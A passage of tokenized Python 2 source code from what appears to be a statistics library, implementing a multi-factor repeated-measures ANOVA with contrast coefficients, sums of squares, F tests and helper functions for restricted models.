[ <NUM_LIT:0> ] + Wcolumns <EOL> Bscols = makelist ( Bbetweens + <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) <EOL> Nwifactors = len ( Wscols ) - <NUM_LIT:1> <EOL> Nwlevels = N . take ( N . 
array ( Nlevels ) , Wscols ) <EOL> Nbtwfactors = len ( Bscols ) - <NUM_LIT:1> <EOL> Nblevels = N . take ( N . array ( Nlevels ) , Bscols ) <EOL> Nwsources = <NUM_LIT:2> ** Nwifactors - <NUM_LIT:1> <EOL> Nbsources = Nallsources - Nwsources <EOL> M = pstat . collapse ( data , Bscols , - <NUM_LIT:1> , None , None , mean ) <EOL> Marray = N . zeros ( Nblevels [ <NUM_LIT:1> : ] , '<STR_LIT:f>' ) <EOL> Narray = N . zeros ( Nblevels [ <NUM_LIT:1> : ] , '<STR_LIT:f>' ) <EOL> for row in M : <EOL> idx = [ ] <EOL> for i in range ( len ( row [ : - <NUM_LIT:1> ] ) ) : <EOL> idx . append ( alluniqueslist [ Bscols [ i ] ] . index ( row [ i ] ) ) <EOL> idx = idx [ <NUM_LIT:1> : ] <EOL> Marray [ idx ] = Marray [ idx ] + row [ - <NUM_LIT:1> ] <EOL> Narray [ idx ] = Narray [ idx ] + <NUM_LIT:1> <EOL> Marray = Marray / Narray <EOL> coefflist = [ [ [ <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:1> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ] , [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:3> , - <NUM_LIT:3> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:2> ] , [ - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , - <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:4> , <NUM_LIT:6> , - <NUM_LIT:4> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:5> , - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , - <NUM_LIT:1> , - <NUM_LIT:4> , - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT:5> ] , [ - <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:4> , - <NUM_LIT:4> , - <NUM_LIT:7> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> , - <NUM_LIT:3> , <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:5> , - <NUM_LIT:10> , <NUM_LIT:10> , - 
<NUM_LIT:5> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:3> , - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:5> , <NUM_LIT:0> , - <NUM_LIT:3> , - <NUM_LIT:4> , - <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:5> ] , [ - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:3> , - <NUM_LIT:7> , <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:1> , - <NUM_LIT:7> , <NUM_LIT:3> ] , [ - <NUM_LIT:1> , <NUM_LIT:4> , - <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:5> , - <NUM_LIT:4> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:6> , <NUM_LIT:15> , - <NUM_LIT:20> , <NUM_LIT:15> , - <NUM_LIT:6> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:7> , - <NUM_LIT:5> , - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] , [ <NUM_LIT:7> , <NUM_LIT:1> , - <NUM_LIT:3> , - <NUM_LIT:5> , - <NUM_LIT:5> , - <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:7> ] , <EOL> [ - <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:3> , - <NUM_LIT:3> , - <NUM_LIT:7> , - <NUM_LIT:5> , <NUM_LIT:7> ] , [ <NUM_LIT:7> , - <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:9> , - <NUM_LIT:3> , - <NUM_LIT> , <NUM_LIT:7> ] , <EOL> [ - <NUM_LIT:7> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:15> , <NUM_LIT:15> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:7> ] , [ <NUM_LIT:1> , - <NUM_LIT:5> , <NUM_LIT:9> , - <NUM_LIT:5> , - <NUM_LIT:5> , <NUM_LIT:9> , - <NUM_LIT:5> , <NUM_LIT:1> ] , <EOL> [ - <NUM_LIT:1> , <NUM_LIT:7> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:7> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , [ <NUM_LIT> , <NUM_LIT:7> , - <NUM_LIT:8> , - <NUM_LIT> , - <NUM_LIT:20> , - <NUM_LIT> , - <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT:0> , - <NUM_LIT:9> , - <NUM_LIT> , - <NUM_LIT:7> , <NUM_LIT> ] , [ 
<NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:11> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:9> , - <NUM_LIT:11> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT:4> , <NUM_LIT:11> , - <NUM_LIT:4> , - <NUM_LIT:9> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:4> , - <NUM_LIT:11> , <NUM_LIT:4> ] , [ <NUM_LIT:4> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT:20> , <NUM_LIT:1> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:4> ] , <EOL> [ - <NUM_LIT:1> , <NUM_LIT:6> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:6> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:8> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:8> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:9> , - <NUM_LIT:7> , - <NUM_LIT:5> , - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , [ <NUM_LIT:6> , <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:3> , - <NUM_LIT:4> , - <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:12> , - <NUM_LIT:12> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT:6> , <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT:11> , - <NUM_LIT:6> , <NUM_LIT:6> , <NUM_LIT:11> , <NUM_LIT:1> , - <NUM_LIT> , <NUM_LIT:6> ] , [ <NUM_LIT:3> , - <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:6> , - <NUM_LIT:8> , - <NUM_LIT:8> , <NUM_LIT:6> , <NUM_LIT:10> , - <NUM_LIT:11> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:9> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:7> , <NUM_LIT:20> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:20> , - <NUM_LIT:7> , <NUM_LIT:1> ] , <EOL> [ - <NUM_LIT:1> , <NUM_LIT:9> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> 
, - <NUM_LIT:9> , <NUM_LIT:1> ] ] ] <EOL> dindex = <NUM_LIT:0> <EOL> NDs = [ <NUM_LIT:0> ] * Nwsources <EOL> for source in range ( Nwsources ) : <EOL> if subset ( source , Bwithins ) : <EOL> NDs [ dindex ] = numlevels ( source , Nlevels ) <EOL> dindex = dindex + <NUM_LIT:1> <EOL> cdata = pstat . collapse ( data , range ( Nfactors + <NUM_LIT:1> ) , - <NUM_LIT:1> , None , None , mean ) <EOL> dummyval = - <NUM_LIT:1> <EOL> datavals = pstat . colex ( data , - <NUM_LIT:1> ) <EOL> while dummyval in datavals : <EOL> dummyval = dummyval - <NUM_LIT:1> <EOL> DA = N . ones ( Nlevels , '<STR_LIT:f>' ) * dummyval <EOL> if len ( Bscols ) == <NUM_LIT:1> : <EOL> subjslots = N . ones ( ( Nsubjects , <NUM_LIT:1> ) ) <EOL> else : <EOL> subjslots = N . zeros ( Nblevels ) <EOL> for i in range ( len ( data ) ) : <EOL> idx = [ ] <EOL> for j in range ( Nfactors + <NUM_LIT:1> ) : <EOL> new = alluniqueslist [ j ] . index ( data [ i ] [ j ] ) <EOL> idx . append ( new ) <EOL> DA [ idx ] = data [ i ] [ - <NUM_LIT:1> ] <EOL> btwidx = N . take ( idx , N . array ( Bscols ) ) <EOL> subjslots [ btwidx ] = <NUM_LIT:1> <EOL> dcount = - <NUM_LIT:1> <EOL> Bwsources = [ ] <EOL> Bwonly_sources = [ ] <EOL> D = N . zeros ( Nwsources , N . PyObject ) <EOL> DM = [ <NUM_LIT:0> ] * Nwsources <EOL> DN = [ <NUM_LIT:0> ] * Nwsources <EOL> for source in range ( <NUM_LIT:3> , Nallsources , <NUM_LIT:2> ) : <EOL> if ( ( source - <NUM_LIT:1> ) & Bwithins ) != <NUM_LIT:0> : <EOL> Bwsources . append ( source - <NUM_LIT:1> ) <EOL> if subset ( ( source - <NUM_LIT:1> ) , Bwithins ) : <EOL> dcount = dcount + <NUM_LIT:1> <EOL> Bwonly_sources . 
append ( source - <NUM_LIT:1> ) <EOL> dwsc = <NUM_LIT:1.0> * DA <EOL> Bnonsource = ( Nallsources - <NUM_LIT:1> ) & ~ source <EOL> Bwscols = makebin ( Wscols ) <EOL> Bwithinnonsource = Bnonsource & Bwscols <EOL> Lwithinnonsource = makelist ( Bwithinnonsource , Nfactors + <NUM_LIT:1> ) <EOL> for i in range ( len ( Lwithinnonsource ) - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> dwsc = amean ( dwsc , Lwithinnonsource [ i ] ) <EOL> mns = dwsc <EOL> Bwithinsource = source & Bwscols <EOL> Lwithinsourcecol = makelist ( Bwithinsource , Nfactors + <NUM_LIT:1> ) <EOL> Lsourceandbtws = makelist ( source | Bbetweens , Nfactors + <NUM_LIT:1> ) <EOL> if Lwithinnonsource < > [ ] : <EOL> Lwithinsourcecol = map ( Lsourceandbtws . index , Lwithinsourcecol ) <EOL> dvarshape = N . array ( N . take ( mns . shape , Lwithinsourcecol [ <NUM_LIT:1> : ] ) ) - <NUM_LIT:1> <EOL> idxarray = N . indices ( dvarshape ) <EOL> newshape = N . array ( [ idxarray . shape [ <NUM_LIT:0> ] , <EOL> N . multiply . reduce ( idxarray . shape [ <NUM_LIT:1> : ] ) ] ) <EOL> indxlist = N . swapaxes ( N . reshape ( idxarray , newshape ) , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> for i in range ( len ( indxlist ) ) : <EOL> coeffmatrix = N . ones ( mns . shape , N . Float ) <EOL> Wsourcecol = makelist ( Bwscols & source , Nfactors + <NUM_LIT:1> ) <EOL> for wfactor in range ( len ( Lwithinsourcecol [ <NUM_LIT:1> : ] ) ) : <EOL> coeffmatrix = N . swapaxes ( coeffmatrix , <NUM_LIT:0> , <EOL> Lwithinsourcecol [ wfactor + <NUM_LIT:1> ] ) <EOL> nlevels = coeffmatrix . shape [ <NUM_LIT:0> ] <EOL> try : <EOL> nextcoeff = coefflist [ nlevels - <NUM_LIT:1> ] [ indxlist [ i , wfactor ] ] <EOL> except IndexError : <EOL> raise IndexError , "<STR_LIT>" <EOL> for j in range ( nlevels ) : <EOL> coeffmatrix [ j ] = coeffmatrix [ j ] * nextcoeff [ j ] <EOL> coeffmatrix = N . 
swapaxes ( coeffmatrix , <NUM_LIT:0> , <EOL> Lwithinsourcecol [ wfactor + <NUM_LIT:1> ] ) <EOL> scratch = coeffmatrix * mns <EOL> for j in range ( len ( coeffmatrix . shape [ <NUM_LIT:1> : ] ) ) : <EOL> scratch = N . add . reduce ( scratch , <NUM_LIT:1> ) <EOL> if len ( scratch . shape ) == <NUM_LIT:1> : <EOL> scratch . shape = list ( scratch . shape ) + [ <NUM_LIT:1> ] <EOL> try : <EOL> tmp = D [ dcount ] . shape <EOL> D [ dcount ] = pstat . aabut ( D [ dcount ] , scratch ) <EOL> except AttributeError : <EOL> D [ dcount ] = scratch <EOL> variables = D [ dcount ] . shape [ <NUM_LIT:1> ] <EOL> tidx = range ( <NUM_LIT:1> , len ( subjslots . shape ) ) + [ <NUM_LIT:0> ] <EOL> tsubjslots = N . transpose ( subjslots , tidx ) <EOL> DMarray = N . zeros ( list ( tsubjslots . shape [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) + <EOL> [ variables ] , '<STR_LIT:f>' ) <EOL> DNarray = N . zeros ( list ( tsubjslots . shape [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) + <EOL> [ variables ] , '<STR_LIT:f>' ) <EOL> idx = [ <NUM_LIT:0> ] * len ( tsubjslots . shape [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) <EOL> idx [ <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> loopcap = N . array ( tsubjslots . shape [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) - <NUM_LIT:1> <EOL> while incr ( idx , loopcap ) < > - <NUM_LIT:1> : <EOL> DNarray [ idx ] = float ( asum ( tsubjslots [ idx ] ) ) <EOL> thismean = ( N . add . reduce ( tsubjslots [ idx ] * <EOL> N . transpose ( D [ dcount ] ) , <NUM_LIT:1> ) / <EOL> DNarray [ idx ] ) <EOL> thismean = N . array ( thismean , N . PyObject ) <EOL> DMarray [ idx ] = thismean <EOL> DM [ dcount ] = DMarray <EOL> DN [ dcount ] = DNarray <EOL> if Bscols [ <NUM_LIT:1> : ] < > [ ] : <EOL> BNs = pstat . 
colex ( [ Nlevels ] , Bscols [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> BNs = [ <NUM_LIT:1> ] <EOL> if ( ( source - <NUM_LIT:1> ) & Bwithins ) == <NUM_LIT:0> : <EOL> sourcecols = makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) <EOL> Lsource = makelist ( ( Nallsources - <NUM_LIT:1> ) & Bbetweens , Nfactors + <NUM_LIT:1> ) <EOL> btwcols = map ( Bscols . index , Lsource ) <EOL> hn = aharmonicmean ( Narray , - <NUM_LIT:1> ) <EOL> SSw = <NUM_LIT:0.0> <EOL> idxlist = pstat . unique ( pstat . colex ( M , btwcols ) ) <EOL> for row in M : <EOL> idx = [ ] <EOL> for i in range ( len ( row [ : - <NUM_LIT:1> ] ) ) : <EOL> idx . append ( alluniqueslist [ Bscols [ i ] ] . index ( row [ i ] ) ) <EOL> idx = idx [ <NUM_LIT:1> : ] <EOL> newval = row [ - <NUM_LIT:1> ] - Marray [ idx ] <EOL> SSw = SSw + ( newval ) ** <NUM_LIT:2> <EOL> Lsource = makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) <EOL> btwsourcecols = ( N . array ( map ( Bscols . index , Lsource ) ) - <NUM_LIT:1> ) . tolist ( ) <EOL> Bbtwnonsourcedims = ~ source & Bbetweens <EOL> Lbtwnonsourcedims = makelist ( Bbtwnonsourcedims , Nfactors + <NUM_LIT:1> ) <EOL> btwnonsourcedims = ( N . array ( map ( Bscols . index , Lbtwnonsourcedims ) ) - <NUM_LIT:1> ) . tolist ( ) <EOL> sourceMarray = amean ( Marray , btwnonsourcedims , <NUM_LIT:1> ) <EOL> sourceNarray = aharmonicmean ( Narray , btwnonsourcedims , <NUM_LIT:1> ) <EOL> ga = asum ( ( sourceMarray * sourceNarray ) / <EOL> asum ( sourceNarray ) ) <EOL> ga = N . reshape ( ga , N . ones ( len ( Marray . shape ) ) ) <EOL> if source == Nallsources - <NUM_LIT:1> : <EOL> sourceNarray = aharmonicmean ( Narray ) <EOL> sub_effects = <NUM_LIT:1.0> * ga <EOL> for subsource in range ( <NUM_LIT:3> , source , <NUM_LIT:2> ) : <EOL> if subset ( subsource - <NUM_LIT:1> , source - <NUM_LIT:1> ) : <EOL> sub_effects = ( sub_effects + <EOL> alleffects [ alleffsources . index ( subsource ) ] ) <EOL> effect = sourceMarray - sub_effects <EOL> alleffects . 
append ( effect ) <EOL> alleffsources . append ( source ) <EOL> SS = asum ( ( effect ** <NUM_LIT:2> * sourceNarray ) * <EOL> N . multiply . reduce ( N . take ( Marray . shape , btwnonsourcedims ) ) ) <EOL> SSlist . append ( SS ) <EOL> SSsources . append ( source ) <EOL> collapsed = pstat . collapse ( M , btwcols , - <NUM_LIT:1> , None , len , mean ) <EOL> contrastmns = pstat . collapse ( collapsed , btwsourcecols , - <NUM_LIT:2> , sterr , len , mean ) <EOL> contrastns = pstat . collapse ( collapsed , btwsourcecols , - <NUM_LIT:1> , None , None , <EOL> N . sum ) <EOL> contrasthns = pstat . collapse ( collapsed , btwsourcecols , - <NUM_LIT:1> , None , None , <EOL> harmonicmean ) <EOL> sourceNs = pstat . colex ( [ Nlevels ] , makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) ) <EOL> dfnum = N . multiply . reduce ( N . ravel ( N . array ( sourceNs ) - <NUM_LIT:1> ) ) <EOL> dfden = Nsubjects - N . multiply . reduce ( N . ravel ( BNs ) ) <EOL> MS = SS / dfnum <EOL> MSw = SSw / dfden <EOL> if MSw < > <NUM_LIT:0> : <EOL> f = MS / MSw <EOL> else : <EOL> f = <NUM_LIT:0> <EOL> if f >= <NUM_LIT:0> : <EOL> prob = fprob ( dfnum , dfden , f ) <EOL> else : <EOL> prob = <NUM_LIT:1.0> <EOL> else : <EOL> sourcewithins = ( source - <NUM_LIT:1> ) & Bwithins <EOL> workD = D [ Bwonly_sources . index ( sourcewithins ) ] <EOL> if len ( workD . shape ) == <NUM_LIT:1> : <EOL> workD = workD [ : , N . NewAxis ] <EOL> if len ( subjslots . shape ) == <NUM_LIT:1> : <EOL> subjslots = subjslots [ : , N . NewAxis ] <EOL> ef = Dfull_model ( workD , subjslots ) <EOL> if subset ( ( source - <NUM_LIT:1> ) , Bwithins ) : <EOL> er = Drestrict_mean ( workD , subjslots ) <EOL> else : <EOL> er = Drestrict_source ( workD , subjslots , source ) + ef <EOL> SSw = LA . determinant ( ef ) <EOL> SS = LA . determinant ( er ) - SSw <EOL> sourceNs = pstat . colex ( [ Nlevels ] , makelist ( source , Nfactors + <NUM_LIT:1> ) ) <EOL> dfnum = N . multiply . reduce ( N . ravel ( N . 
array ( sourceNs ) - <NUM_LIT:1> ) [ <NUM_LIT:1> : ] ) <EOL> if subset ( source - <NUM_LIT:1> , Bwithins ) : <EOL> dfden = Nsubjects - N . multiply . reduce ( N . ravel ( BNs ) ) - dfnum + <NUM_LIT:1> <EOL> MS = SS / dfnum <EOL> MSw = SSw / dfden <EOL> if MSw < > <NUM_LIT:0> : <EOL> f = MS / MSw <EOL> else : <EOL> f = <NUM_LIT:0> <EOL> if f >= <NUM_LIT:0> : <EOL> prob = fprob ( dfnum , dfden , f ) <EOL> else : <EOL> prob = <NUM_LIT:1.0> <EOL> else : <EOL> try : <EOL> p = workD . shape [ <NUM_LIT:1> ] <EOL> except IndexError : <EOL> p = <NUM_LIT:1> <EOL> k = N . multiply . reduce ( N . ravel ( BNs ) ) <EOL> m = Nsubjects - <NUM_LIT:1> - ( p + k ) / <NUM_LIT> <EOL> d_en = float ( p ** <NUM_LIT:2> + ( k - <NUM_LIT:1> ) ** <NUM_LIT:2> - <NUM_LIT:5> ) <EOL> if d_en == <NUM_LIT:0.0> : <EOL> s = <NUM_LIT:1.0> <EOL> else : <EOL> s = math . sqrt ( ( ( p * ( k - <NUM_LIT:1> ) ) ** <NUM_LIT:2> - <NUM_LIT:4> ) / d_en ) <EOL> dfden = m * s - dfnum / <NUM_LIT> + <NUM_LIT:1> <EOL> if LA . determinant ( er ) < > <NUM_LIT:0> : <EOL> lmbda = LA . determinant ( ef ) / LA . determinant ( er ) <EOL> W = math . pow ( lmbda , ( <NUM_LIT:1.0> / s ) ) <EOL> f = ( ( <NUM_LIT:1.0> - W ) / W ) * ( dfden / dfnum ) <EOL> else : <EOL> f = <NUM_LIT:0> <EOL> if f >= <NUM_LIT:0> : <EOL> prob = fprob ( dfnum , dfden , f ) <EOL> else : <EOL> prob = <NUM_LIT:1.0> <EOL> suffix = '<STR_LIT>' <EOL> if prob < <NUM_LIT> : suffix = '<STR_LIT>' <EOL> elif prob < <NUM_LIT> : suffix = '<STR_LIT>' <EOL> elif prob < <NUM_LIT> : suffix = '<STR_LIT:*>' <EOL> adjsourcecols = N . 
array ( makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) ) - <NUM_LIT:1> <EOL> thiseffect = '<STR_LIT>' <EOL> for col in adjsourcecols : <EOL> if len ( adjsourcecols ) > <NUM_LIT:1> : <EOL> thiseffect = thiseffect + effects [ col ] [ <NUM_LIT:0> ] <EOL> else : <EOL> thiseffect = thiseffect + ( effects [ col ] ) <EOL> outputlist = ( outputlist <EOL> + [ [ thiseffect , round4 ( SS ) , dfnum , <EOL> round4 ( SS / float ( dfnum ) ) , round4 ( f ) , <EOL> round4 ( prob ) , suffix ] ] <EOL> + [ [ thiseffect + '<STR_LIT>' , round4 ( SSw ) , dfden , <EOL> round4 ( SSw / float ( dfden ) ) , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ] <EOL> + [ [ '<STR_LIT:\n>' ] ] ) <EOL> Lsource = makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) <EOL> collapsed = pstat . collapse ( cdata , Lsource , - <NUM_LIT:1> , sterr , len , mean ) <EOL> prefixcols = range ( len ( collapsed [ <NUM_LIT:0> ] [ : - <NUM_LIT:3> ] ) ) <EOL> outlist = pstat . colex ( collapsed , prefixcols ) <EOL> eff = [ ] <EOL> for col in Lsource : <EOL> eff . append ( effects [ col - <NUM_LIT:1> ] ) <EOL> for item in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:N>' ] : <EOL> eff . append ( item ) <EOL> outlist = pstat . abut ( outlist , <EOL> map ( round4 , pstat . colex ( collapsed , - <NUM_LIT:3> ) ) , <EOL> map ( round4 , pstat . colex ( collapsed , - <NUM_LIT:2> ) ) , <EOL> map ( round4 , pstat . colex ( collapsed , - <NUM_LIT:1> ) ) ) <EOL> outlist = [ eff ] + outlist <EOL> pstat . printcc ( outlist ) <EOL> print <EOL> print <EOL> title = [ [ '<STR_LIT>' , '<STR_LIT>' ] + effects [ : Nfactors ] ] <EOL> title = title + [ [ '<STR_LIT>' ] + Nlevels ] <EOL> facttypes = [ '<STR_LIT>' ] * Nfactors <EOL> for i in range ( len ( Wscols [ <NUM_LIT:1> : ] ) ) : <EOL> facttypes [ Wscols [ i + <NUM_LIT:1> ] - <NUM_LIT:1> ] = '<STR_LIT>' <EOL> title = title + [ [ '<STR_LIT>' , '<STR_LIT>' ] + facttypes ] <EOL> pstat . 
printcc ( title ) <EOL> print <EOL> title = [ [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:F>' , '<STR_LIT:p>' , '<STR_LIT>' ] ] + [ '<STR_LIT>' ] <EOL> outputlist = title + outputlist <EOL> pstat . printcc ( outputlist ) <EOL> return <EOL> def Dfull_model ( workd , subjslots ) : <EOL> """<STR_LIT>""" <EOL> workd = subtr_cellmeans ( workd , subjslots ) <EOL> sserr = multivar_SScalc ( workd ) <EOL> return sserr <EOL> def Drestrict_mean ( workd , subjslots ) : <EOL> """<STR_LIT>""" <EOL> errors = subtr_cellmeans ( workd , subjslots ) <EOL> grandDmeans = amean ( workd , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> errors = errors + N . transpose ( grandDmeans ) <EOL> sserr = multivar_SScalc ( errors ) <EOL> return sserr <EOL> def Drestrict_source ( workd , subjslots , source ) : <EOL> """<STR_LIT>""" <EOL> if source > <NUM_LIT:0> : <EOL> sourcewithins = ( source - <NUM_LIT:1> ) & Bwithins <EOL> sourcebetweens = ( source - <NUM_LIT:1> ) & Bbetweens <EOL> dindex = Bwonly_sources . index ( sourcewithins ) <EOL> all_cellmeans = N . transpose ( DM [ dindex ] , [ - <NUM_LIT:1> ] + range ( <NUM_LIT:0> , len ( DM [ dindex ] . shape ) - <NUM_LIT:1> ) ) <EOL> all_cellns = N . transpose ( DN [ dindex ] , [ - <NUM_LIT:1> ] + range ( <NUM_LIT:0> , len ( DN [ dindex ] . shape ) - <NUM_LIT:1> ) ) <EOL> hn = aharmonicmean ( all_cellns ) <EOL> levels = D [ dindex ] . shape [ <NUM_LIT:1> ] <EOL> SSm = N . zeros ( ( levels , levels ) , '<STR_LIT:f>' ) <EOL> tworkd = N . transpose ( D [ dindex ] ) <EOL> RSw = N . zeros ( ( levels , levels ) , '<STR_LIT:f>' ) <EOL> RSinter = N . zeros ( ( levels , levels ) , N . PyObject ) <EOL> for i in range ( levels ) : <EOL> for j in range ( i , levels ) : <EOL> RSw [ i , j ] = RSw [ j , i ] = N . sum ( tworkd [ i ] * tworkd [ j ] ) <EOL> cross = all_cellmeans [ i ] * all_cellmeans [ j ] <EOL> multfirst = asum ( cross * all_cellns [ i ] ) <EOL> RSinter [ i , j ] = RSinter [ j , i ] = N . 
asarray ( multfirst ) <EOL> SSm [ i , j ] = SSm [ j , i ] = ( amean ( all_cellmeans [ i ] ) * <EOL> amean ( all_cellmeans [ j ] ) * <EOL> len ( all_cellmeans [ i ] ) * hn ) <EOL> SSw = RSw - RSinter <EOL> Lsource = makelist ( sourcebetweens , Nfactors + <NUM_LIT:1> ) <EOL> btwsourcecols = ( N . array ( map ( Bscols . index , Lsource ) ) - <NUM_LIT:1> ) . tolist ( ) <EOL> Bbtwnonsourcedims = ~ source & Bbetweens <EOL> Lbtwnonsourcedims = makelist ( Bbtwnonsourcedims , Nfactors + <NUM_LIT:1> ) <EOL> btwnonsourcedims = ( N . array ( map ( Bscols . index , Lbtwnonsourcedims ) ) - <NUM_LIT:1> ) . tolist ( ) <EOL> sourceDMarray = DM [ dindex ] * <NUM_LIT:1.0> <EOL> for dim in btwnonsourcedims : <EOL> if dim == len ( DM [ dindex ] . shape ) - <NUM_LIT:1> : <EOL> raise ValueError , "<STR_LIT>" <EOL> sourceDMarray = amean ( sourceDMarray , dim , <NUM_LIT:1> ) <EOL> sourceDNarray = aharmonicmean ( DN [ dindex ] , btwnonsourcedims , <NUM_LIT:1> ) <EOL> variableNs = asum ( sourceDNarray , <EOL> range ( len ( sourceDMarray . shape ) - <NUM_LIT:1> ) ) <EOL> ga = asum ( ( sourceDMarray * sourceDNarray ) / <EOL> variableNs , <EOL> range ( len ( sourceDMarray . shape ) - <NUM_LIT:1> ) , <NUM_LIT:1> ) <EOL> if source == Nallsources - <NUM_LIT:1> : <EOL> sourceDNarray = aharmonicmean ( DN [ dindex ] , <EOL> range ( len ( sourceDMarray . shape ) - <NUM_LIT:1> ) ) <EOL> sub_effects = ga * <NUM_LIT:1.0> <EOL> for subsource in range ( <NUM_LIT:3> , source - <NUM_LIT:2> , <NUM_LIT:2> ) : <EOL> subsourcebtw = ( subsource - <NUM_LIT:1> ) & Bbetweens <EOL> if ( propersubset ( subsource - <NUM_LIT:1> , source - <NUM_LIT:1> ) and 